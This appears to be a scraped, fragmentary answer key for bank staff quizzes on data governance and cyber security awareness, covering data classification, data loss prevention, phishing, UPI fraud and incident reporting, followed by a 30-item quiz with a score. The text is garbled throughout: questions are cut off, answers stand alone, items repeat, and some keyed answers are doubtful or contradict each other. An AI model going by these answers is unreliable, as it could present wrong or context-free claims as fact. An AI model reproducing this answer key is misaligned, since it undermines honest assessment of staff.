A: FALSE

A: Both 1 & 2

that
customer

A: All of the above
Q: In the Data Infringement portal, unattended infringements on Data Loss

Prevention (DLP) may result in_____
A: Penal Score (1 to 4 marks) in RFIA of the Branch
Q: A staff can be held accountable for Data quality errors.

A: TRUE
Parties” which of the following is NOT to be considered as “Third Party”
A: Internal Auditors
Q: Customer sensitive Granular Data can be copied and stored without any approval
A: FALSE
Q: What are the two important pillars of the SOP on „Customer Sensitive Granular A:
Data Sharing and Access – Within Bank‟s Environment‟:
A: Regulated & Limited access
Q: What are the different categories of Data Classification

A: SENSITIVE, CONFIDENTIAL, INTERNAL, PUBLIC
Q: “Customer PII Data” is classified as ____________ Data

A: CONFIDENTIAL
Q: Impact of poor Data Quality on a Branch include ____

A: Both 1 & 2 above
Q: Which of the following is not one of the functions of an effective Data Loss
A: Follow-up with Data users for Data Quality enhancement
Q: In an Account Opening Form, if Data has been provided by customer in non

mandatory field ( like mobile number /email ID ), what should be done while inputting
in CBS?
A: Input the Data exactly as given by the customer
Q: Sharing of customer sensitive granular Data is governed by which Policy :

A: Data Governance Policy
Q: Scope of Customer Sensitive Granular Data Sharing & Access Framework

covers:
A: All of the above
Q: For official purpose, if we are required to share customer sensitive data, then we
should:
A: Delete the data after use
Q: Which one is NOT an approved way of sharing granular Data/access Data under
normal circumstances:
A: E-mail
Q: Salient features of Project Ganga include:

A: Customer One view
Q: What are the impacts of not verifying the pop-up name of PAN holder, while
fetching PAN details
A: 1& 2
Q: Incorrect spelling of Customer name comes under which one of the following Data
Quality Dimension?
A: Accuracy


A: Both 1 & 2

A: All of the above
A: 1& 2
Q: Can we store customer data on our Desktop ?

A: NO
Q: Objectives of Data Quality are:

A: All of the above
Q: A customer has submitted Voter Card as OVD, along with AOF. During the
scrutiny, it was found that the age of customer is less than 18
A: DOB on OVD and AOF, if same, then only account may be opened
Q: Capturing of incorrect CRA rating / ECR in a loan account may result in _____
A: Both 1 & 2
Q: Error categories in DQI for CIF related errors are:

A: Risk categorization
B. Personal Profile
C. PAN Related
D. Gender Related
E. Age Related
A: All of the Above
Q: Capturing of incorrect interest rate in loan accounts may result in ____________

A: All of the above
Q: Non capturing of PAN in CIF, even if furnished in the AOF, may result in ___
A: Both 1 & 2
A: Cannot be shared

that
customer

A: FALSE
A: 1 & 3
Q: The access to Customer Sensitive Granular Data to the users should be made
strictly on the basis of-
A: Both 1 & 2
Q: Which of the following is not a type of Data leak

A: Improper categorization of sensitive Data
Q: “SBI telephone directory” is classified as ____________ Data

A: INTERNAL
Q: What are the possible means by which Customer Sensitive Granular Data can get
divulged or leaked to any unrelated person / third party like vendors, dealers etc:
A: All of the above
DATA GOVERNANCE & CYBER SECURITY MODULE 3
Q: Which one of the following risks is not considered while evaluating a third party
vendor for risk assessment?
A: Market Risk

Bluetooth connection. Once such a connection is established then the attacker will be
able to steal photos, messages and contacts etc.
A: Bluesnarfing

Q: Non-repudiation is carried out through the services of authentication, authorization,

A: Secure encryption of the information
Q: Which one of the following is the leading illicit dark web marketplace which was
taken down by the FBI in what was considered then as a significant action on the Dark
web market?
A: Silk Road 2.0
Q: Which one of the following best describes a Man in the Middle (MITM) attack?
A: An attack used to monitor and potentially modify communications between two users
Correct?
A: a, c and d
Q: Which of the following attacks is not categorised under Exploit based attacks?
A: Email hijacking

Q: What is the full form of MITB Attack?

A: Man in the Browser
Q: If you click on the padlock sign in the Address bar. Which of the following information
will be available to you?
A: You will get information on who owns the site and who has verified the site
Q: What is a “Collect Request” in a UPI transaction?

A: It is a feature available in BHIM SBI Pay

A: DNS Spoofing
Q: Which one of the following statements is more appropriate in terms of Vendor risk
assessment?
A: Continuous assessment of Vendor security practices need to be done throughout the


Q: _______ malware is a warning-like popup or reminder in a Laptop/PC/Mobile?

A: Scareware
Q: Which of the following may not be the signs that the Mobile Phone (Android/iOS) is
hacked?
A: All statements are signs that the Mobile phone is hacked

A: The hackers through one malicious code in SolarWinds Orion software gained
access to thousands of other companies.
using this credential. What is the new security feature in OnlineSBI?
Q: Which of the following options is not to protect yourself from keyloggers?

A: Antivirus companies keep their records of the most common malware keyloggers and
will flag them as dangerous.
Q: Social Engineering Attacks does not include _____________

A: Denial of Service attack

A: Compliance and security are the same
Q: Which of the following best describes the Supply chain attack?

A: Supply chain attack occurs when hackers infiltrates systems through an outside
partner or provider who has access to the target systems and data

A: It is a malicious attempt to disrupt the normal traffic of a targeted server, service or
Q: While doing an ATM transaction, a customer is required to use a physical card

provided to him by the Bank and also a PIN code to authenticate the transaction. This
practice ensures which of the following triad of Information Security?
A: Confidentiality
A: Use of a secure Hashing algorithm for the information ensures Integrity.

A: It is an attack meant to shut down a machine or network, making it inaccessible to its intended users
Q: Which one of the following is a precautions to be taken while operating the ATM?
A: Check if any extra suspicious device is attached to the ATM machine.

Q: Select the correct statement about the impact of Cyber Risks.

A: All are true
Q: __________ malware is a warning-like popup or reminder in a Laptop/PC/Mobile?

A: Scareware
Q: Which of the following principles of the first of the CIA Triad Confidentiality is/are Correct?
A: a, b and d
Q: What is not true about SIM Swapping?

A: Fraudsters get access to the root of the mobile phone through SIM Swapping
Q: With the enhanced sharing of information over a global network for almost all life functions ,
which one of the following
A: Non-repudiation

A: IT team is alone not responsible for Cyber Security

Q: Which one of the following is the leading illicit dark web marketplace which was taken down by
the FBI in what was
A: Silk Road 2.0
Q: The technique for sending SMS that appears to be initiated from the organization for KYC
updation, Account credit, Account
A: Spoofing
Q: The technique used to send the emails to all the employees of the Bank is known as
____________.
A: Spear Phishing

A: The hackers through one malicious code in the application of SolarWinds vendor’s application gained
access to Orion software
Q: Your friend fears that he has shared the user credentials of OnlineSBI with a stranger. It is a
Sunday and Bank is closed.
A: Change the password
Q:
Even if a user compromises his/her login credentials of OnlineSBI, no one can login using this credential. What is
the

A: Logic Bomb
A:
a, c and d
Q: Which of the following browsers allows access to the Network which is popular for implementing encrypted
routing
A: Tor
Q: The fraudster gets the personal details of the people through _______technique.
A: Social engineering
Q: Which of the following is not the examples of data?

A: All are examples of data
Q: Which one is not an option for disabling UPI services?

A:YONO Main Screen UPI Enable/Disable UPI
Q: Ajit is doing a merchant transaction to pay the mobile bill. He selects net banking of SBI for making online
payment. He
A: It should start with https://www.onlinesbi.com
Q: If you want to change the username and password for your SBI Internet banking, which of the following
statements is
A: You cannot change the Username but he/she can change the password at any time

Q:A Cyber-Attack
A: option a & b
Q: _____________is used for obtaining unauthorized access to mobile phones via Bluetooth connection. Once
such a connection
A: Bluesnarfing

Q: SBI internet banking site provides a facility to bypass such keylogger malware. Identify the feature.
A: Online Virtual Keyboard
Q: Method that is NOT suggested to prevent new account fraud.

A: Contact the bank immediately and ensure all the operating accounts are closed
Q: Can we create the password in other regional language (Other than English and
Hindi) in Retail Internet Banking?
A: You can use the multilingual image based virtual keyboard in Hindi or English
only.
Q: Which one of the following options is not a violation of acceptable usage policy?
A: Receiving mails from his batchmate
Q: Impact of Cyber risks are_________________

A: All of the above
Q: What is the “Time of detection of incident” for reporting the purpose of a cyber
incident to RBI, CERT-In & NCIIPC?
A: Time at which, the incident is brought to the knowledge of any official of AO,
including DGM & Module CISO
Q: Which of the following options is NOT a good wi-fi security practice?

A: You can use unsecure or open Wi-Fi for official purposes in case of emergency


A: It is not necessary to inform your organization always, if you come across any
discrepancies.
Q: As part of IS awareness and commemoration of Computer Security Day, SBI did

NOT organize which one of the following activities?
A: Cold calling all the employees
Q: “Ransomware” can be spread through_____________?

A: Option 1 and 2
Item 11
Q: Who can report cyber incidents to Information Security Department (ISD)?

A: Anyone who knows about cyber incidents including general public
Q: Which of the following statements is correct regarding creation of Profile

password using the Multilingual Image based Virtual keyboard?
A: The Profile password should be a combination of alphabets (in the language
Q: Which of the following is NOT one of the best practices to maintain your
password?
A: Only difficult dictionary words should be used
Q: Customer reported an unauthorised UPI transaction of Rs.72,000/- in his account.

He reported the incident on the same day to the bank. The bank is not able to
establish customer negligence even after completion of 90 days from the date of
complaint. As per Limiting Liability of customer guidelines, how much amount does
the Bank needs to pay to the customer in this situation?
A: Rs.72,000/-
Q: Select the wrong statement about the Acceptable usage policy (IS Policy) of our
Bank?
A: Successful backup of critical applications or data should be ensured yearly and to
be kept offsite.
Q: The time at which the cyber incident is brought to the knowledge of any official of
__________ shall be treated as time of detection of incident.
A: Information Security Dept. CC Mumbai
Q: Select the wrong statement about Desktop / Laptops /Workstations Usage?

A: Create a shortcut of a document/file instead of copying it on the desktop

Q: Which of the following options is crucial in any UPI fraud related to Collect
request?
A: option a & b
Q: Which one of the following is the most important aspect for an organization as big
and global as SBI to protect itself from cyber security attacks and subsequent loss of
brand image?
A: A training awareness program that would provide education and guidance on a
range of information security topics to all the internal users of its systems and
applications.
Q: Which one of the following options does not substantiate the Acceptable Usage Policy of our Bank?
A: However, Mobile and laptop given to the staff for personal holding have exceptions to the policy.
Q: Which of the following statements is NOT correct in the WannaCry case?

A: The attackers collective called The Lazarus Group.
Q: Identify some of the risks involved in using public free WiFi.

A: All of the above statements are correct
Q: Websites use CAPTCHA to avoid password guessing by automated tools to prevent from
_______.
A: Dictionary Attack
Q: Which one of the following options is not a concern for password security?
A: In case of any breach in a Social Media Handle, delete your Social Media Account instead of
changing the password.
Q: Which of the following incident(s) should be reported to RBI, CERT-In & NCIIPC?
A: All of the above
Q: If a Bank always allow some of the employees to bring their own laptops, smart phones, tablets
etc. to office for office use
A: Bring Your Own Device
Q: Can we create the password in other regional language (Other than English and Hindi) in Retail
Internet Banking?
A: You can use the multilingual image based virtual keyboard in Hindi or English only.

Q: Select the wrong statement about the Acceptable usage policy (IS Policy) of our Bank?
A: All are true
Q: Which of the following statements is not true about Acceptable usage policy (IS Policy) of our
Bank?
A: Employee’s mobile devices need not have Antivirus software
Q: What action will you take, when you are defrauded?

A: Lock the user access immediately
Q: The company asked their employees to use their own devices and internet access while
working from home. List some devices of the employees (iii) Asking the employees to use
enterprise VPN
A: Options (i) , (ii) and (iii) are necessary
Q: Which one of the following options is not considered as incident for reporting to RBI, NCIIPC
and CERT-In?
A: All of the above
Q: Which of the following statements is correct regarding creation of Profile password using the
Multilingual Image based
A: The Profile password should be a combination of alphabets (in the language chosen), and
Q: Which one of the following applications is not a threat to compromise confidentiality of the
A: Air watch agent
Q: What are the ways you can report an unauthorised transaction (ATM) without visiting the
branch?
A: Call dedicated number 1800 1111 09 also Can raise through https://crcf.sbi.co.in
Q: Which of the following steps would not be a part of the planning for Work from home?
A: Ensuring the physical access to the systems room is restricted and monitored
Q: Which one of the following options is NOT a violation of acceptable usage policy?
A: There was a data vulnerability due to lack of Anti-virus
Q: What is the timelines for reporting of cyber incidents to RBI and other Statutory Authorities
CERT-In & NCIIPC? Who
A: All cyber security incidents should be reported within 2 to 6 hours by Incident Response &
Management Team
Q: Which of the following options is an example of inappropriate use of the e-mail service?
A: Use of other officers' user ids or using a false identity.


A: For web security, verify full URL by clicking the link, but do not give any personal/confidential
information
DATA GOVERNANCE QUIZ
https://sbiquiz.statebanktimes.in/dgq/
1. At the time of account opening, it was found that Educational

Qualification was not mentioned by the customer in AOF, but it is a
mandatory filed in CBS
a. Teller should leave it blank as it has not been filled by customer
b. As it is mandatory in CBS, teller can fill any details as per his understanding
c. Teller should contact, the customer and get the required details and then fill in CBS
d. 1 or 2
2. Customer sensitive Granular Data can be copied and

stored without any approval
a. true
b. false
3. "Vendor pricing strategy" is classified as ____________

Data
a. SENSITIVE
b. CONFIDENTIAL
c. INTERNAL
d. PUBLIC
4. Capturing of incorrect security in secured loan accounts may result in

_____________.
a. A/C outrightly classified as loss asset if security value is less than 10% of limit.
b. Incorrect Risk weight
c. Both 1 & 2
d. Neither 1 nor 2
5. "Customer salary, pay-slips" Transaction numbers and related Data

"Customer (or families) Personal and Personally identifiable Data -
Name, biometrics and consent" is classified as
a. SENSITIVE
b. CONFIDENTIAL
c. INTERNAL
d. PUBLIC
6. The access to Customer Sensitive Granular Data to the users should be

made strictly on the basis of-
a. Need-To-Know
b. Need-To-Access
c. Both 1 & 2
d. Neither 1 nor 2
7. Data Management Office (DMO) is headed by

a. AGM (DMO)
b. CGM (DMO)
c. GM & CDMO
d. DMD & CIO
8. A staff can be held accountable for Data quality errors.

a. TRUE
b. FALSE
9. Capturing of incorrect / incomplete Data adversely affects:

a. Data Quality
b. Analytical Models
c. Both 1 & 2
d. Neither 1 nor 2
10. What are the impacts of not verifying the pop-up name of PAN
holder, while fetching PAN details
a. PAN of any other person could be fed in the system
b. Feeding incorrect PAN details could lead to mis-match of TDS details of the customer
c. 1& 2
d. No impact of not verifying the pop-up name of PAN holder, while fetching PAN details
11. What is/are the possible consequences of Data Leakage:

a. Financial loss
b. Reputational damage
c. Regulatory strictures
d. All the above
12. A customer has submitted Voter Card as OVD, along with AOF.
During the scrutiny, it was found that the age of customer is less than 18
a. OVD can be accepted
b. DOB on OVD and AOF, if same, then only account may be opened
c. OVD has to be accepted, as it is a govt. document
d. if one can vote, he is not a minor. OVD should be accepted
13. DQI Index has been included as one of the Key Responsibility Areas
(KRAs) in Carrer Development System (CDS)
a. TRUE
b. FALSE
14. Capturing of incorrect CRA rating / ECR in a loan account may

result in ______.
a. Incorrect Interest Rate
b. Incorrect Risk weight
c. Both 1 & 2
d. Neither 1 nor 2
15. As per the Data Governance Policy, Data Governance Officer (DGO)
needs to be nominated/designated at -
a. Circle
b. Administrative Office
c. RBO
d. All the above
16. Data Protection officer reports to ___ ?

a. GM & Chief Data Management Officer
b. CGM (Compliance)
c. CGM (R&DB Ops)
d. Chief Vigilance Officer
17. Prime objective of Data governance framework is to ensure-

a. Compliance with relevant legislation, regulatory requirements, policies, procedures and
standards.
b. To define the roles and responsibilities for Data stakeholders, and to establish clear lines of
accountability.
c. Effective assurance and control of Data management processes.
d. All of the above
18. To boost the housing loan business of the branch , list of HNIs can be
shared with HLCs through:
a. Email
b. Physical copy
c. Not to be shared
d. Pen drive
19. Updated policies or SOPs on Data Governance can be accessed

through ( Give Four different paths of SBI times)
a. SBI Times>>Knowledge Hub>>SOPs>>DMO>>
b. SBI Times>>MIS Online >>SOPs>>DMO>>
c. SBI Times>>HR dashboard>>SOPs>>DMO>>

d. None of the above
20. Impact of poor Data Quality on a Branch include ____

a. Penal Score (1 to 3 marks) in RFIA for Project Ganga errors
b. Penal Score (1 to 3 marks) in RFIA for DQI errors
c. Either 1 or 2
d. Both 1 & 2 above
21. The best principles for improving Data Quality include(s)

a. Doing the things right at very first instance
b. Doing the right things every time
c. Either 1 or 2
d. Both 1 & 2 above
22. Data breach risk mitigation period for Medium category of

Data breach is
a. 1 DAY
b. 2 DAYS
c. 5 DAYS
d. 7 DAYS
23. In ________________ Processing, small group of transactions are

processed on demand
a. Batch
b. Real Time
c. Virtual Time
d. System
24. What are the main sources for low Data Quality?
a. Initial Data Conversion
b. Manual Data Entry
c. Batch Feed
d. All of the above
25. Sharing of Data with exernal agencies is governed by

a. SOP on Customer Sensitive Granular Data Sharing
b. SOP on Data Sharing with External agencies/third parties
c. SOP on Data Loss Prevention
d. SOP on Data Infringement
26. Data Governance Policy is applicable to all the domestic offices

of SBI including:
a. all IT and IS assets
b. Data in motion, Data in use, Data at rest
c. all IT and IS processes
d. All of the above
27. "SBI telephone directory" is classified as ____________

Data
a. SENSITIVE
b. CONFIDENTIAL
c. INTERNAL
d. PUBLIC
28. In the Data Infringement portal, unattended infringements on

Data Loss Prevention (DLP) may result in_____
a. Penal Score (5 marks) in RFIA of the Branch
b. Penal Score (10 marks) in RFIA of the Branch
c. Penal Score (1 to 4 marks) in RFIA of the Branch

d. No impact on Branch RFIA score
29. Objectives of Data Quality are: i. Accuracy, validity

ii.timeliness, completeness iii.uniqueness, consistency
a. i & ii only
b. i,ii & iii
c. i only
d. None of above
30. "Vendor analysis reports" is classified as ____________ Data

a. SENSITIVE
b. CONFIDENTIAL
c. INTERNAL
d. PUBLIC
Thank You For Your Participation
Your Score is : 24/30
Get eCertificate

DG Key

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

DG Key

Uploaded by

Copyright:

Available Formats

As per the Data Governance Policy, Data Governance Officer (DGO) needs to be

All the above

All of the above

Data Governance ensures that Data is Accessible to _____ set of People

Which of the following activity are considered under Data Management?

All of the above

Restricted access to Data means:

For personal communication, we can use our official email IDs

All statements are signs that the Mobile phone is hacked

Which of the following statement(s) is false?

Select the wrong statement.

Information Security Dept. CC Mumbai

Time of Reporting to Bank/Fi & Type of transactions (ATM/UPI/INB)

What are the main sources for low Data Quality?

All of the above

All of the above

Data Governance Organisation involves a multi-tiered combination of business and technology

All of the above

People, Process and Technology

Data is always originated within the organization

Data Governance Vision identifies Data as :

Data Governance Council-Business Unit/Vertical is being headed by

Both (i) & (ii) are correct

Data Management Office (DMO) is headed by

Apex level Data Governance Council (ADGC)

Master Data Management Process Includes ______

All of the Above

Design of better Analytics based products mainly depends on ________

Who Provides directions in Data Governance Organisation?

Apex Data Governance Council / Data Governance Executive Council

All of the Above

Analytics refers to the process of using Data in order to:

All of the above

Providing training to staff is one of the responsibilities of Data Management Office

Data Governance Journey in SBI started with ___

Approval of Data Governance policy by the Central Board

Data Governance ensures Integrity of the data as ____

Single Source of Truth

All of the above

Technology Solutions which help in data Governance initiatives include ______

All of the Above

As per Interim arrangement CDMO reports to ___

All the above

Data Governance Policy is applicable to

All employees of the Bank

Data Stakeholders also includes ______

All of the above

Circle Data Governance Council (C-DGC) is headed by

Data Governance objective is to maintain Data in _____ form

DMD & CIO

Data Governance Vision identifies Data as :

Incorect handling of data may result in exposing an organization to significant liabilities.

For official communication , we can use our personal email IDs

Which of the following is NOT a type of Customer Sensitive Data

List of Top Management of the Bank

All of the above

What is Distributed Denial of Service Attacks?

Which one of the following is a unique feature of APT attacks?

Cross site scripting

Which of the following statements is false?

The user’s response to bulk SMS can compromise their identities.

Who is primarily responsible for reporting cyber security incidents ?

Deputy General Manager (AC) at LHO

Select the wrong statement.